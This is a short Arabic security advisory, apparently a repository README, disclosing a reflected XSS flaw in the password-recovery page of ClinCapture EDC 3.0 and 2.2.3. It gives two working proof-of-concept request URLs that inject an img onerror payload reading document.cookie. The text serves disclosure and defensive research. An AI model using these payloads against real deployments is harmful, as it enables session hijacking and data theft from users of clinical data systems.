
ثغرة XSS المنعكسة في ClinCapture EDC
هذا المستودع لأغراض البحث الأمني التعليمي والدفاعي فقط
ثغرة برمجة نصية عبر المواقع (XSS) المنعكسة في ClinCapture EDC 3.0 و2.2.3، تسمح لمهاجم خارجي غير مصادق بتنفيذ كود JavaScript في سياق متصفح الضحية.

لإثبات الثغرة، يجب الانتقال إلى تبويب استعادة كلمة المرور وتحديد الحمولة في معامل الاسم أو البريد الإلكتروني، أو إرسال طلب واحد
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

يمكن لمستخدم غير مصادق تنفيذ كود JavaScript في سياق متصفح الضحية، بهدف تنفيذ إجراءات نيابة عن الضحية أو سرقة معلومات سرية، مثل إجابة سؤال الأمان.